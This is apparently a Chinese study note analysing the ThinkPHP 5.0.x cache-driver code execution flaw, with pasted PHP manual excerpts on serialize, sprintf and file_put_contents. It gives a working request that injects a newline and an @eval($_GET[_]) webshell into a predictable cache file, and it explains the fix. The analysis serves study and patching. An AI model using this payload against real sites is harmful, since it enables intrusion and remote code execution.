ThinkPHP5漏洞分析之代码执行

漏洞概要

本次漏洞存在于 ThinkPHP 的缓存类中。该类会将缓存数据通过序列化的方式，直接存储在 .php 文件中，攻击者通过精心构造的 payload ，即可将 webshell 写入缓存文件。缓存文件的名字和目录均可预测出来，一旦缓存目录可访问或结合任意文件包含漏洞，即可触发 远程代码执行漏洞 。漏洞影响版本： 5.0.0<=ThinkPHP5<=5.0.10 。

漏洞环境

ThinkPHP5-5.0.10

将 application/index/controller/Index.php 文件代码设置如下：

<?php
namespace app\index\controller;
use think\Cache;
class Index
{
    public function index()
    {
        Cache::set("name",input("get.username"));
        return 'Cache success';
    }
}

显示Cache success，没看懂

192.168.10.128/tp5010/public/index.php?username=mochazz123%0d%0a@eval($_GET[_]);//

即可将 webshell 写入缓存文件。

可以看到缓存文件已经成功写入

漏洞分析

我们跟进 Cache 类的 set 方法，发现其先通过单例模式 init 方法，创建了一个类实例，该类由 cache 的配置项 type 决定，默认情况下其值为 File 。在本例中， self::$handler 即为 think\cache\driver\File 类实例。

在 thinkphp/library/think/cache/driver/ 目录下，我们可以看到 Thinkphp5 支持的几种缓存驱动类。我们接着上面的分析，程序调用 think\cache\driver\File 类的 set 方法。可以看到 data 数据没有经过任何处理，只是序列化后拼接存储在文件中，这里的 $this->options['data_compress'] 变量默认情况下为 false ，所以数据不会经过 gzcompress 函数处理。虽然在序列化数据前面拼接了单行注释符 // ，但是我们可以通过注入换行符绕过该限制。

现在我们就来看看缓存文件的名字是如何生成的。从上一张图片 第142行 ，我们可以看到文件名是通过调用 getCacheKey 方法获得的，我们跟进该方法。可以看到缓存文件的子目录和文件名均和缓存类设置的键有关（如本例中缓存类设置的键为 name ）。程序先获得键名的 md5 值，然后将该 md5 值的前 2 个字符作为缓存子目录，后 30 字符作为缓存文件名。如果应用程序还设置了前缀 $this->options['prefix'] ，那么缓存文件还将多一个上级目录。  

data:"s"表示字符串；20表示长度，

php 序列化的字母标识_php中 序列化字符串以o开头跟以c开头有什么区别-CSDN博客

serialize

(PHP 4, PHP 5, PHP 7, PHP 8)

serialize — 生成值的可存储表示

说明

serialize(mixed $value): string

生成值的可存储表示。

这有利于存储或传递 PHP 的值，同时不丢失其类型和结构。

想要将已序列化的字符串变回 PHP 的值，可使用 unserialize()。

参数

value

要序列化的值。serialize() 处理所有的类型，除了 resource 类型和一些 object（见下面的注释）。serialize() 甚至可以序列化包含对自身引用的数组。数组/对象内的循环引用也会被存储。其它任何引用都会丢失。

序列化对象时，PHP 将尝试在序列化之前调用成员函数 __serialize() 或 __sleep()。这是为了允许对象在序列化之前进行最后一分钟的清理等等。同样，当使用 unserialize() 恢复对象时，会调用 __unserialize() 或 __wakeup() 成员函数。

注意:

对象的 private 成员会在名前添加类名；protected 成员会在名前添加“*”；这些前置值在两边都有 null 字节。

返回值

返回字符串，包含 value 的字节流表示，可以存储在任何地方。

注意这可能是包含 null 字节的二进制字符串，需要按原样存储和处理。例如，serialize() 的输出通常应该存储在数据库中 的 BLOB 字段，而不是 CHAR 或 TEXT 字段。

示例

<?php
// $sssion_data 是多维数组，包含当前用户的
// 会话信息。可以在请求结束时使用 serialize()
// 将其存储在数据库中。
$conn = odbc_connect("webdb", "php", "chicken");
$stmt = odbc_prepare($conn,
"UPDATE sessions SET data = ? WHERE id = ?");
$sqldata = array (serialize($session_data), $_SERVER['PHP_AUTH_USER']);
if (!odbc_execute($stmt, $sqldata)) {
$stmt = odbc_prepare($conn,
"INSERT INTO sessions (id, data) VALUES(?, ?)");
if (!odbc_execute($stmt, array_reverse($sqldata))) {
/* Something went wrong.. */
}
}
?>

注释

注意:

注意许多内置 PHP 对象不能序列化。然而，要么实现 Serializable 接口，要么实现 __serialize()/__unserialize() 或 __sleep()/__wakeup() 魔术方法的则是可以的。如果内部类不满足这些其中任意一个，则就不能可靠的进行序列化。

上述规则有一些历史例外，一些内部对象可以在不实现接口或公开方法的情况下，使其序列化。

 %0使用0来填充12位，

d	参数视为整数并以（有符号）十进制数字呈现。

sprintf

PHP: sprintf - Manual

(PHP 4, PHP 5, PHP 7, PHP 8)

sprintf — 返回格式化字符串

说明

sprintf(string $format, mixed ...$values): string

返回一个根据格式化字符串 format 生成的字符串。

示例  参数替换

支持按顺序用参数替换格式字符串里的占位符。

<?php
$num = 5;
$location = 'tree';

$format = 'There are %d monkeys in the %s';
echo sprintf($format, $num, $location);
?>

以上示例会输出：

There are 5 monkeys in the tree

假设，我们想把它国际化，在一个单独的文件中创建格式字符串，我们将它重写为：

<?php
$format = 'The %s contains %d monkeys';
echo sprintf($format, $num, $location);
?>

我们现在有一个问题。 格式字符串中占位符的顺序与代码中参数的顺序不匹配。 我们希望保持代码原样，并在格式字符串中简单地指出占位符引用的参数。 我们可以这样写格式化字符串：

<?php
$format = 'The %2$s contains %1$d monkeys';
echo sprintf($format, $num, $location);
?>

另外一个好处是占位符可以重复使用，而无需在代码中添加更多参数。

<?php
$format = 'The %2$s contains %1$d monkeys.
That\'s a nice %2$s full of %1$d monkeys.';
echo sprintf($format, $num, $location);
?>

file_put_contents

(PHP 5, PHP 7, PHP 8)

file_put_contents — 将数据写入文件

说明

file_put_contents(
    string $filename,
    mixed $data,
    int $flags = 0,
    ?resource $context = null
): int|false

和依次调用 fopen()，fwrite() 以及 fclose() 功能一样。

如果 filename 不存在，将会创建文件。反之，存在的文件将会重写，除非设置 FILE_APPEND flag。

参数

filename

要被写入数据的文件名。

data

要写入的数据。类型可以是 string，array 或者是 stream 资源（如上面所说的那样）。

如果 data 指定为 stream 资源，这里 stream 中所保存的缓存数据将被写入到指定文件中，这种用法就相似于使用 stream_copy_to_stream() 函数。

参数 data 可以是数组（但不能为多维数组），这就相当于 file_put_contents($filename, join('', $array))。

flags

flags 的值可以是 以下 flag 使用 OR (|) 运算符进行的组合。

Available flags

Flag	描述
FILE_USE_INCLUDE_PATH	在 include 目录里搜索 filename。 更多信息可参见 include_path。
FILE_APPEND	如果文件 filename 已经存在，追加数据而不是覆盖。
LOCK_EX	在写入时获取文件独占锁。换句话说，在调用 fopen() 和 fwrite() 中间发生了 flock() 调用。这与调用带模式“x”的 fopen() 不同。

context

一个 context 资源。

返回值

该函数将返回写入到文件内数据的字节数，失败时返回false

警告

此函数可能返回布尔值 false，但也可能返回等同于 false 的非布尔值。请阅读 布尔类型章节以获取更多信息。应使用 === 运算符来测试此函数的返回值。

示例

<?php
$file = 'people.txt';
// 打开文件获取已经存在的内容
$current = file_get_contents($file);
// 追加新成员到文件
$current .= "John Smith\n";
// 将内容写回文件
file_put_contents($file, $current);
?>

至此，我们已将本次漏洞分析完毕，接下来还想说说关于该漏洞的一些细节。首先，这个漏洞要想利用成功，我们得知道缓存类所设置的键名，这样才能找到 webshell 路径；其次如果按照官方说明开发程序， webshell 最终会被写到 runtime 目录下，而官方推荐 public 作为 web 根目录，所以即便我们写入了 shell ，也无法直接访问到；最后如果程序有设置 $this->options['prefix'] 的话，在没有源码的情况下，我们还是无法获得 webshell 的准确路径

解释：

?username=mochazz123%0d%0a@eval($_GET[_]);//

这里的%0d%0a十六进制代表" \r \n "换行符， 而<?php\n//会将我们的内容都给注释掉，为了能跳出注释，这里使用换行，而我们输入最后的注释是要注释掉后边产生要闭合的' "; ' 

漏洞修复

官方的修复方法是：将数据拼接在 php 标签之外，并在 php 标签中拼接 exit() 函数。

现在明白刚开始提示的Cache success了。。。